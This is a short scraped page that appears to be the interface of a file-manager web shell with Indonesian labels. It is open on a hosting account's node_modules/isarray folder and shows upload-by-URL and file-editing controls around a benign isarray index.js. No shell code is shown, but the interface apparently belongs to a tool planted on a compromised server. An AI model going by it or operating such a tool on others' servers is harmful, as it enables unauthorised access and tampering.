CURRENT PATH:
/
home
/
dnsimamg
/
mail
/
tmp
/
node_modules
/
isarray
/
KEMBALI
|
HOME
Upload File Local:
Upload
Upload via URL:
Download
Dir Baru
File Baru
Editing:
index.js
var toString = {}.toString; module.exports = Array.isArray || function (arr) { return toString.call(arr) == '[object Array]'; };
SIMPAN
BATAL